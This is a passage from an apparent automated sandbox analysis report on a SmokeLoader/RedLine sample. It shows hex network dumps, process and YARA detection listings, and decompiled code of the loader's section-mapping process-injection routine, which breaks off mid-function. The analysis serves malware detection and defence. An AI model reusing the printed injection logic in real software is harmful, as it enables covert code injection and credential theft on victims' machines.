                  Data Ascii: 2000;pm,&/\jqfAUf4)^l;W=My(H16h}WAOQ"u~(d']CYbQF2BvA%^Md#Zv5lq$lh6"f+o^;=&R{%A8$<"E(N'w6goMpig5gXLT4d~
                  2022-10-10 21:21:48 UTC303INData Raw: a6 9d 1a fe de cb
                  Data Ascii:
                  2022-10-10 21:21:48 UTC303INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC303INData Raw: 32 30 30 30 0d 0a bc a1 e7 db 68 48 e2 61 4a 46 6a 08 e3 00 bf a4 b3 c4 2a 58 82 ad 8b 6f c4 a2 e9 61 58 bb 31 47 4f 0c 51 cc d1 d7 29 cc f1 94 24 3f a1 f7 22 70 ce b1 9f 7d 65 e4 b4 74 79 5c 76 a2 71 a9 49 e5 ec 83 86 5f eb 20 72 02 af 8c 8c 0f 96 54 d4 b2 6f d4 5f 54 c6 7c 40 e3 87 1c 5d 48 98 d8 fe 99 d1 80 d0 57 24 98 8d 74 a0 ca 1e ae 36 a2 18 f3 12 a3 73 8d b5 c2 46 cb 7a b8 17 83 be 10 10 1e 1f be 83 48 4a 7e 4c 96 11 b9 b8 22 62 4f 07 e7 52 7d 8e 45 c9 68 b0 3a 88 21 ed 95 7a a4 67 a2 d8 47 fd 76 3e 8b 50 d3 a0 22 d8 4c 54 36 d0 d4 d4 2e 54 91 31 75 51 2c 8d ab 3b 07 b6 d8 1e 82 41 6b 29 fd 86 2d 73 7d 24 55 c5 9a 35 c9 91 91 66 48 ca 99 4c e4 1b cf 68 b4 99 45 5f 18 a6 a2 e1 57 0c 89 9b 4d 86 44 5e 37 04 70 9c 08 eb d5 63 9a 3b 70 ca 14 1d 79 37
                  Data Ascii: 2000hHaJFj*XoaX1GOQ)$?"p}ety\vqI_ rTo_T|@]HW$t6sFzHJ~L"bOR}Eh:!zgGv>P"LT6.T1uQ,;Ak)-s}$U5fHLhE_WMD^7pc;py7
                  2022-10-10 21:21:48 UTC311INData Raw: 8b 66 fa d4 f9 ff
                  Data Ascii: f
                  2022-10-10 21:21:48 UTC311INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC311INData Raw: 32 30 30 30 0d 0a 02 86 3f 15 a0 52 49 9e d7 48 94 a5 16 e5 b2 0c 3c d4 b6 f6 65 65 da 17 da 1d 06 4c c2 a3 10 21 85 f9 bc 24 ff 83 61 65 e1 20 d8 8e 6b ab a5 e0 5b ac 74 dd fd f8 eb fc 32 5e e4 04 9a 02 ed 1b 89 56 1f 13 61 5a f3 8c 21 85 25 b7 51 30 c2 90 24 73 45 f0 95 63 5f 21 59 1a fd 13 a4 b0 5b 14 6a 87 49 42 db 64 6a b9 25 39 c3 56 35 37 9f 46 9d 26 11 20 a6 a1 81 6e ed 98 7b 29 4c 35 72 be 33 82 e8 3a e5 d2 1e e4 fb 91 da b1 24 28 ee f7 13 80 c3 a7 92 0b 21 a3 d0 84 78 df 53 27 c2 ed 78 1e 53 4f c5 6b 11 be ab ae 71 39 85 62 83 be 22 b8 83 c8 f4 d4 68 3f b1 e9 b9 f5 f1 a9 cb 06 83 e0 d9 46 85 36 b9 32 44 29 7d 51 4d 7f 6a 20 56 2a 83 46 b5 d0 c2 d6 f5 72 45 58 b0 ae ca 70 3c a0 1d 9d b2 ac 65 a9 bc e9 c6 86 b4 c4 7d 16 cc e6 11 92 08 58 39 90 fb
                  Data Ascii: 2000?RIH<eeL!$ae k[t2^VaZ!%Q0$sEc_!Y[jIBdj%9V57F& n{)L5r3:$(!xS'xSOkq9b"h?F62D)}QMj V*FrEXp<e}X9
                  2022-10-10 21:21:48 UTC319INData Raw: 8c 1d e5 28 40 15
                  Data Ascii: (@
                  2022-10-10 21:21:48 UTC319INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC319INData Raw: 32 30 30 30 0d 0a 79 c6 99 a6 d8 35 4e b7 6a 06 d1 22 7c 88 1d c7 0f 32 11 e5 1b 98 35 b7 ed 8e 44 0a 3b 79 d0 a9 29 4a 25 b1 81 fd 70 ea bd 28 08 4e fa 15 b3 52 ae c6 dc 57 fd 04 96 15 b7 97 7f 6d 99 18 01 a6 c1 96 c9 79 e7 a1 e2 8f 09 d1 49 37 e2 10 29 b3 f2 f8 4e 53 bd e1 66 9f 80 c0 ea 6c 10 ba 2a 30 03 24 bf b8 13 a0 57 08 9a 80 4a 4b 47 56 a5 a7 d1 f9 03 4f ec 38 d4 c7 ca b6 80 03 76 0e 45 60 11 0d 25 a0 3a 7e 5a a3 6e 6a 9a b4 e8 ba 84 4d 64 c4 a7 7d 73 7a b1 1a 45 cc c3 90 ac 60 b5 5e 93 48 d2 75 d2 1b 61 9b b9 2f 23 67 d0 5e ca 49 27 ae 49 4b 4d 0b 98 6f ea 74 1a a9 4e 8f a3 36 ae 8d 8f 01 a1 3d cf 56 d8 71 12 17 d0 d4 2d c5 7b 94 b3 3d 1f 4f 1e 63 62 42 39 08 68 e9 0d f9 ae ca ee 62 bc 0d 59 91 43 f5 84 04 dd 96 af cf 6a 99 c4 d1 e4 b3 e5 86 7a
                  Data Ascii: 2000y5Nj"|25D;y)J%p(NRWmyI7)NSfl*0$WJKGVO8vE`%:~ZnjMd}szE`^Hua/#g^I'IKMotN6=Vq-{=OcbB9hbYCjz
                  2022-10-10 21:21:48 UTC327INData Raw: 97 ef 3d f0 4d 63
                  Data Ascii: =Mc
                  2022-10-10 21:21:48 UTC327INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC327INData Raw: 31 66 66 38 0d 0a ad 39 a4 c1 62 0d fb 20 4c cb 9c c0 ab da be af 0b 32 55 94 e8 9a 2f 98 b8 05 31 db 2d be e1 32 07 c9 aa 21 33 95 19 e0 ef 7b 31 86 b4 0e c2 b0 dd ec 07 f8 53 0b 1a 1e ba 75 13 51 a2 3f a1 7f 38 79 f2 c1 f7 08 4c 1c 30 05 0d c0 1a 9b 11 90 f6 cb e0 e6 34 d4 a2 64 d6 5a 23 d2 3f 0a c8 fb 7b 66 d8 e2 6d 57 81 11 be 58 e1 ab 80 55 aa 25 94 f4 ad e7 51 21 74 e3 18 81 fe 33 7a e3 15 cb b3 94 c9 17 91 5d 4f 35 e3 96 ea c3 f7 f9 be 4c bc 05 fa 4b 42 e3 77 53 ec 0f 6f 6c 6e 5e e3 97 53 be 13 88 e4 74 4d 50 1b 68 f3 9a 6b cf 50 b3 65 9e fd 6a c5 b9 cf be e4 62 3a 5d 47 4a 59 81 9a 11 db 06 a2 72 7f 97 4a 32 e7 46 4b 35 27 72 51 5c e0 d6 8d 0f 26 1c e1 8f 64 13 e5 3e 60 34 89 0c 4e 95 42 03 2d 11 a3 76 70 3b 2f ae a4 ee d9 bf 48 68 59 c0 e6 24 16
                  Data Ascii: 1ff89b L2U/1-2!3{1SuQ?8yL04dZ#?{fmWXU%Q!t3z]O5LKBwSoln^StMPhkPejb:]GJYrJ2FK5'rQ\&d>`4NB-vp;/HhY$
                  2022-10-10 21:21:48 UTC335INData Raw: 32 30 30 30 0d 0a
                  Data Ascii: 2000
                  2022-10-10 21:21:48 UTC335INData Raw: 8d 5d 25 9c 36 51 b3 ec ff dd ea 33 2d 2f c7 e9 f5 62 40 cd b6 2f e1 15 83 40 36 d7 f4 85 dd af 46 4a 91 0e 73 52 db 55 f3 c9 7b a2 67 6e 56 a1 7a 1b d8 b3 2a 45 f4 ce da 60 70 3b 93 df 80 56 be 3d ae f1 b3 79 0a fa 80 b2 f5 ce 34 d2 26 3a d3 4e 31 45 18 78 4c ff 94 af 54 5d fd 1d b3 b6 33 10 cc 11 7e 32 52 7b 92 ec 36 c6 28 3e 90 b2 9f b2 77 fb f9 ef fd 5c cb c5 95 e5 10 33 0a ed 50 ef 1a fc c4 a9 eb 9f 21 36 09 35 cc f2 fb 1f eb fd 3f 09 d3 e2 6f 85 63 b2 b5 d0 33 ec f5 f1 57 35 40 cc ac 71 9d 5b f9 e9 7a b0 f6 dd 49 88 6f 3f 2f 68 57 15 f0 32 3a 95 59 77 c8 bb f7 5c 0e 12 c2 7f 24 1d 6c b5 0f da 22 df c9 91 ae 45 8d 66 37 e0 12 96 7f a1 ba 97 80 40 a2 8d 79 01 3d ac 1b f4 e5 23 b6 9b 9d 89 57 d2 e6 19 d1 31 63 93 c6 f3 37 7a d8 20 32 66 64 c2 30 26 63
                  Data Ascii: ]%6Q3-/b@/@6FJsRU{gnVz*E`p;V=y4&:N1ExLT]3~2R{6(>w\3P!65?oc3W5@q[zIo?/hW2:Yw\$l"Ef7@y=#W1c7z 2fd0&c
                  2022-10-10 21:21:48 UTC343INData Raw: 0d 0a
                  2022-10-10 21:21:48 UTC607INData Raw: 00 00 00 00 00 00
                  Data Ascii:
                  2022-10-10 21:21:48 UTC607INData Raw: 0d 0a
                  Data Ascii:
                  2022-10-10 21:21:48 UTC607INData Raw: 31 30 34 38 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Data Ascii: 1048



                  Target ID:0
                  Start time:23:19:44
                  Start date:10/10/2022
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\file.exe
                  Imagebase:0x400000
                  File size:281600 bytes
                  MD5 hash:28167CBFD672C0FC70358D19DE3826EB
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.378991345.0000000000941000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.378991345.0000000000941000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.378728276.0000000000610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.378728276.0000000000610000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.378830916.0000000000652000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.378681921.0000000000600000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  Reputation:low

                  Target ID:1
                  Start time:23:19:53
                  Start date:10/10/2022
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff69bc80000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.360730072.0000000002901000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.360730072.0000000002901000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high

                  Target ID:2
                  Start time:23:20:39
                  Start date:10/10/2022
                  Path:C:\Users\user\AppData\Roaming\ichffhi
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Roaming\ichffhi
                  Imagebase:0x400000
                  File size:281600 bytes
                  MD5 hash:28167CBFD672C0FC70358D19DE3826EB
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.431105965.00000000005F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.431072790.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.431249824.0000000000643000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.431007198.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 44%, ReversingLabs
                  Reputation:low

                  Target ID:6
                  Start time:23:21:47
                  Start date:10/10/2022
                  Path:C:\Users\user\AppData\Local\Temp\586.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\586.exe
                  Imagebase:0x400000
                  File size:610304 bytes
                  MD5 hash:5C3FAFBD0E6546D41F902B129CE27E7B
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low


                    Execution Graph

                    Execution Coverage:4.4%
                    Dynamic/Decrypted Code Coverage:45%
                    Signature Coverage:17.8%
                    Total number of Nodes:202
                    Total number of Limit Nodes:7

                    C-Code - Quality: 54%
                    			E0040143B(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
                    				char _v8;
                    				long _v12;
                    				void* _v16;
                    				void* _v20;
                    				char _v44;
                    				char _v52;
                    				long _v56;
                    				long _v60;
                    				char _v64;
                    				char _v68;
                    				char _v72;
                    				char _v76;
                    				char _v84;
                    				char _v88;
                    				char _v92;
                    				intOrPtr _v96;
                    				char _v100;
                    				void* __edi;
                    				void* __ebp;
                    				intOrPtr _t84;
                    				intOrPtr _t87;
                    				long _t90;
                    				void* _t91;
                    				struct _GUID _t98;
                    				struct _GUID _t100;
                    				PVOID* _t102;
                    				PVOID* _t104;
                    				intOrPtr* _t108;
                    				PVOID* _t120;
                    				PVOID* _t122;
                    				intOrPtr _t126;
                    				long* _t129;
                    				signed int _t136;
                    				int _t137;
                    				intOrPtr _t154;
                    				void* _t159;
                    				intOrPtr* _t160;
                    				void* _t163;
                    				void* _t170;
                    				long _t171;
                    				intOrPtr _t172;
                    				void* _t173;
                    				long* _t178;
                    				intOrPtr* _t179;
                    				HANDLE* _t180;
                    				HANDLE* _t181;
                    				void* _t186;
                    				void* _t187;
                    				intOrPtr* _t190;
                    				void* _t191;
                    				intOrPtr _t194;
                    				intOrPtr* _t195;
                    				void* _t196;
                    				void* _t197;
                    				intOrPtr* _t198;
                    				long _t216;
                    				void* _t222;
                    
                    				_push(0x1474);
                    				_t84 =  *_t195;
                    				_t196 = _t195 + 4;
                    				E00401134(_t84, _t170, __eflags, _t222);
                    				_t126 = _a4;
                    				_t171 = 0;
                    				_v56 = 0;
                    				if(gs != 0) {
                    					_v56 = _v56 + 1;
                    				}
                    				while(1) {
                    					_t87 =  *((intOrPtr*)(_t126 + 0x48))();
                    					if(_t87 != 0) {
                    						break;
                    					}
                    					 *((intOrPtr*)(_t126 + 0x1c))(0x3e8);
                    				}
                    				_v96 = _t87;
                    				_t178 =  &_v100;
                    				 *_t178 = _t171;
                    				 *((intOrPtr*)(_t126 + 0x4c))(_t87, _t178);
                    				_t90 =  *_t178;
                    				if(_t90 != 0) {
                    					_t129 =  &_v52;
                    					 *_t129 = _t90;
                    					_t129[1] = _t171;
                    					_t179 =  &_v44;
                    					 *((intOrPtr*)(_t126 + 0x10))(_t179, 0x18);
                    					 *_t179 = 0x18;
                    					_push( &_v52);
                    					_push(_t179);
                    					_push(0x40);
                    					_push( &_v20);
                    					if( *((intOrPtr*)(_t126 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t171, _t171, 2) == 0) {
                    						_v12 = _t171;
                    						_t98 =  &_v84;
                    						 *(_t98 + 4) = _t171;
                    						 *_t98 = 0x5000;
                    						_t180 =  &_v88;
                    						if(NtCreateSection(_t180, 6, _t171, _t98, 4, 0x8000000, _t171) == 0) {
                    							_push(_v84);
                    							_pop( *_t25);
                    							_t120 =  &_v72;
                    							 *_t120 = _t171;
                    							if(NtMapViewOfSection( *_t180, 0xffffffff, _t120, _t171, _t171, _t171,  &_v60, 1, _t171, 4) == 0) {
                    								_t122 =  &_v64;
                    								 *_t122 = _t171;
                    								if(NtMapViewOfSection( *_t180, _v16, _t122, _t171, _t171, _t171,  &_v60, 1, _t171, 4) == 0) {
                    									_t194 = _v72;
                    									 *((intOrPtr*)(_t126 + 0x20))(_t171, _t194, 0x104);
                    									 *((intOrPtr*)(_t194 + 0x208)) = _a16;
                    									_v12 = _v12 + 1;
                    								}
                    							}
                    						}
                    						_t100 =  &_v84;
                    						 *(_t100 + 4) = _t171;
                    						 *_t100 = _a12 + 0x10000;
                    						_t181 =  &_v92;
                    						if(NtCreateSection(_t181, 0xe, _t171, _t100, 0x40, 0x8000000, _t171) == 0 && _v12 != 0) {
                    							_push(_v84);
                    							_pop( *_t46);
                    							_t102 =  &_v76;
                    							 *_t102 = _t171;
                    							if(NtMapViewOfSection( *_t181, 0xffffffff, _t102, _t171, _t171, _t171,  &_v60, 1, _t171, 4) == 0) {
                    								_t104 =  &_v68;
                    								 *_t104 = _t171;
                    								_t216 = NtMapViewOfSection( *_t181, _v16, _t104, _t171, _t171, _t171,  &_v60, 1, _t171, 0x20);
                    								if(_t216 == 0) {
                    									L21();
                    									if(_t216 == 0 && _t216 != 0) {
                    										asm("xlatb");
                    										asm("rcl dword [ebx], 0x8b");
                    									}
                    									_t197 = _t196 + 4;
                    									_push(0x2eb0);
                    									_t198 = _t197 + 4;
                    									_push(0x2260);
                    									_t154 =  *_t198;
                    									_push(_t154);
                    									asm("lodsb");
                    									asm("loop 0xffffffc9");
                    									_t186 = _a8 +  *_a8;
                    									_t136 =  *(_t186 + 6) & 0x0000ffff;
                    									_push(_t186);
                    									_t159 = _t186;
                    									if(_v56 == 0) {
                    										_t160 = _t159 + 0xf8;
                    										__eflags = _t160;
                    									} else {
                    										_t160 = _t159 + 0x108;
                    									}
                    									_push(_t136);
                    									_t137 =  *(_t160 + 0x10);
                    									if(_t137 != 0) {
                    										memcpy( *((intOrPtr*)(_t160 + 0xc)) + _v76,  *((intOrPtr*)(_t160 + 0x14)) + _a8, _t137);
                    									}
                    									asm("loop 0xffffffe6");
                    									_pop(_t187);
                    									if(_v56 == 0) {
                    										_push(_t187);
                    										_t163 =  *((intOrPtr*)(_t187 + 0x34)) - _v68;
                    										_t190 =  *((intOrPtr*)(_t187 + 0xa0)) + _v76;
                    										__eflags = _t190;
                    										while(1) {
                    											__eflags =  *_t190;
                    											if( *_t190 == 0) {
                    												break;
                    											}
                    											_t172 =  *_t190;
                    											_t190 = _t190 + 8;
                    											asm("lodsw");
                    											__eflags = 0;
                    											if(0 != 0) {
                    												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t163;
                    												__eflags =  *((intOrPtr*)(0 + _v76 + _t172));
                    											}
                    											asm("loop 0xffffffe9");
                    										}
                    										_pop(_t191);
                    										_t171 = 0;
                    										__eflags = 0;
                    										_t108 =  &_v8;
                    										 *_t108 = 0;
                    										 *((intOrPtr*)(_t126 + 0x98))(_v16, 0, 0, 0, 0, 0,  *((intOrPtr*)(_t191 + 0x28)) + _v68, _v64, _t108, 0);
                    									} else {
                    										L54();
                    										_pop(_t173);
                    										_t171 = _t173 - 0x16ee;
                    										 *((intOrPtr*)(_t171 + 0x1722)) = _t171 + 0x2bbb;
                    										L004011C3();
                    										0x33(_t171 + 0x2bbb, 0x1ad);
                    										 *((intOrPtr*)(_t171 + 0x1747)) = _t171 + 0x2c0b;
                    										0x33();
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				_t91 = 0x1474;
                    				_push(0x379);
                    			}

                    APIs
                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004014E7
                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401514
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401537
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401555
                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401596
                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015C7
                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004015E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.378458801.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Similarity
                    • API ID: Section$View$Create$DuplicateObject
                    • String ID:
                    • API String ID: 1546783058-0
                    • Opcode ID: a1a548987cee5af6a20eaada0c048d68b1c52e2eb5f25007b876aabe9c92dcad
                    • Instruction ID: a241dfb1a7147892ad06c72b7904183168c99d91159797a80032ec6269488466
                    • Opcode Fuzzy Hash: a1a548987cee5af6a20eaada0c048d68b1c52e2eb5f25007b876aabe9c92dcad
                    • Instruction Fuzzy Hash: E2513F74900209BFEB208F91CC89FAF7BB8EF85B50F10412AF911BA1E5D7749941CB65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    control_flow_graph 125 401446-401482 call 401134 133 401484 125->133 134 401487-40148c 125->134 133->134 136 4017b2-4017ba 134->136 137 401492-4014a3 134->137 136->134 140 4017b0-4017d3 137->140 141 4014a9-4014d2 137->141 148 4017e5 140->148 141->140 149 4014d8-4014ef NtDuplicateObject 141->149 149->140 150 4014f5-401519 NtCreateSection 149->150 153 401575-40159b NtCreateSection 150->153 154 40151b-40153c NtMapViewOfSection 150->154 153->140 157 4015a1-4015a5 153->157 154->153 156 40153e-40155a NtMapViewOfSection 154->156 156->153 158 40155c-401572 156->158 157->140 159 4015ab-4015cc NtMapViewOfSection 157->159 158->153 159->140 160 4015d2-4015ee NtMapViewOfSection 159->160 160->140 162 4015f4 call 4015f9 160->162
                    C-Code - Quality: 56%
                    			E00401446(void* __eax, void* __edi) {
                    				intOrPtr _t85;
                    				intOrPtr _t88;
                    				long _t91;
                    				void* _t92;
                    				struct _GUID _t99;
                    				struct _GUID _t101;
                    				PVOID* _t103;
                    				PVOID* _t105;
                    				intOrPtr* _t109;
                    				PVOID* _t121;
                    				PVOID* _t123;
                    				intOrPtr _t127;
                    				long* _t131;
                    				signed int _t138;
                    				int _t139;
                    				intOrPtr _t156;
                    				void* _t161;
                    				intOrPtr* _t162;
                    				void* _t165;
                    				long _t173;
                    				intOrPtr _t175;
                    				void* _t176;
                    				long* _t181;
                    				intOrPtr* _t183;
                    				HANDLE* _t184;
                    				HANDLE* _t185;
                    				void* _t190;
                    				void* _t191;
                    				intOrPtr* _t194;
                    				void* _t195;
                    				void* _t198;
                    				void* _t199;
                    				intOrPtr* _t201;
                    				void* _t202;
                    				void* _t204;
                    				intOrPtr* _t205;
                    				void* _t209;
                    				long _t223;
                    				void* _t229;
                    
                    				asm("sbb bh, [edx]");
                    				_t209 = __eax - 0x78;
                    				asm("int 0xaa");
                    				_push(0x1474);
                    				_t85 =  *_t201;
                    				_t202 = _t201 + 4;
                    				E00401134(_t85, __edi, _t209, _t229);
                    				_t127 =  *((intOrPtr*)(_t199 + 8));
                    				_t173 = 0;
                    				 *((intOrPtr*)(_t199 - 0x34)) = 0;
                    				if(gs != 0) {
                    					 *((intOrPtr*)(_t199 - 0x34)) =  *((intOrPtr*)(_t199 - 0x34)) + 1;
                    				}
                    				while(1) {
                    					_t88 =  *((intOrPtr*)(_t127 + 0x48))();
                    					if(_t88 != 0) {
                    						break;
                    					}
                    					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
                    				}
                    				 *((intOrPtr*)(_t199 - 0x5c)) = _t88;
                    				_t181 = _t199 - 0x60;
                    				 *_t181 = _t173;
                    				 *((intOrPtr*)(_t127 + 0x4c))(_t88, _t181);
                    				_t91 =  *_t181;
                    				if(_t91 != 0) {
                    					_t131 = _t199 - 0x30;
                    					 *_t131 = _t91;
                    					_t131[1] = _t173;
                    					_t183 = _t199 - 0x28;
                    					 *((intOrPtr*)(_t127 + 0x10))(_t183, 0x18);
                    					 *_t183 = 0x18;
                    					_push(_t199 - 0x30);
                    					_push(_t183);
                    					_push(0x40);
                    					_push(_t199 - 0x10);
                    					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject( *(_t199 - 0x10), 0xffffffff, 0xffffffff, _t199 - 0xc, _t173, _t173, 2) == 0) {
                    						 *(_t199 - 8) = _t173;
                    						_t99 = _t199 - 0x50;
                    						 *(_t99 + 4) = _t173;
                    						 *_t99 = 0x5000;
                    						_t184 = _t199 - 0x54;
                    						if(NtCreateSection(_t184, 6, _t173, _t99, 4, 0x8000000, _t173) == 0) {
                    							 *_t25 =  *(_t199 - 0x50);
                    							_t121 = _t199 - 0x44;
                    							 *_t121 = _t173;
                    							if(NtMapViewOfSection( *_t184, 0xffffffff, _t121, _t173, _t173, _t173, _t199 - 0x38, 1, _t173, 4) == 0) {
                    								_t123 = _t199 - 0x3c;
                    								 *_t123 = _t173;
                    								if(NtMapViewOfSection( *_t184,  *(_t199 - 0xc), _t123, _t173, _t173, _t173, _t199 - 0x38, 1, _t173, 4) == 0) {
                    									_t198 =  *(_t199 - 0x44);
                    									 *((intOrPtr*)(_t127 + 0x20))(_t173, _t198, 0x104);
                    									 *((intOrPtr*)(_t198 + 0x208)) =  *((intOrPtr*)(_t199 + 0x14));
                    									 *(_t199 - 8) =  *(_t199 - 8) + 1;
                    								}
                    							}
                    						}
                    						_t101 = _t199 - 0x50;
                    						 *(_t101 + 4) = _t173;
                    						 *_t101 =  *((intOrPtr*)(_t199 + 0x10)) + 0x10000;
                    						_t185 = _t199 - 0x58;
                    						if(NtCreateSection(_t185, 0xe, _t173, _t101, 0x40, 0x8000000, _t173) == 0 &&  *(_t199 - 8) != 0) {
                    							 *_t46 =  *(_t199 - 0x50);
                    							_t103 = _t199 - 0x48;
                    							 *_t103 = _t173;
                    							if(NtMapViewOfSection( *_t185, 0xffffffff, _t103, _t173, _t173, _t173, _t199 - 0x38, 1, _t173, 4) == 0) {
                    								_t105 = _t199 - 0x40;
                    								 *_t105 = _t173;
                    								_t223 = NtMapViewOfSection( *_t185,  *(_t199 - 0xc), _t105, _t173, _t173, _t173, _t199 - 0x38, 1, _t173, 0x20);
                    								if(_t223 == 0) {
                    									L20();
                    									if(_t223 == 0 && _t223 != 0) {
                    										asm("xlatb");
                    										asm("rcl dword [ebx], 0x8b");
                    									}
                    									_t204 = _t202 + 4;
                    									_push(0x2eb0);
                    									_t205 = _t204 + 4;
                    									_push(0x2260);
                    									_t156 =  *_t205;
                    									_push(_t156);
                    									asm("lodsb");
                    									asm("loop 0xffffffc9");
                    									_t190 =  *((intOrPtr*)(_t199 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t199 + 0xc))));
                    									_t138 =  *(_t190 + 6) & 0x0000ffff;
                    									_push(_t190);
                    									_t161 = _t190;
                    									if( *((intOrPtr*)(_t199 - 0x34)) == 0) {
                    										_t162 = _t161 + 0xf8;
                    										__eflags = _t162;
                    									} else {
                    										_t162 = _t161 + 0x108;
                    									}
                    									_push(_t138);
                    									_t139 =  *(_t162 + 0x10);
                    									if(_t139 != 0) {
                    										memcpy( *((intOrPtr*)(_t162 + 0xc)) +  *(_t199 - 0x48),  *((intOrPtr*)(_t162 + 0x14)) +  *((intOrPtr*)(_t199 + 0xc)), _t139);
                    									}
                    									asm("loop 0xffffffe6");
                    									_pop(_t191);
                    									if( *((intOrPtr*)(_t199 - 0x34)) == 0) {
                    										_push(_t191);
                    										_t165 =  *((intOrPtr*)(_t191 + 0x34)) -  *(_t199 - 0x40);
                    										_t194 =  *((intOrPtr*)(_t191 + 0xa0)) +  *(_t199 - 0x48);
                    										__eflags = _t194;
                    										while(1) {
                    											__eflags =  *_t194;
                    											if( *_t194 == 0) {
                    												break;
                    											}
                    											_t175 =  *_t194;
                    											_t194 = _t194 + 8;
                    											asm("lodsw");
                    											__eflags = 0;
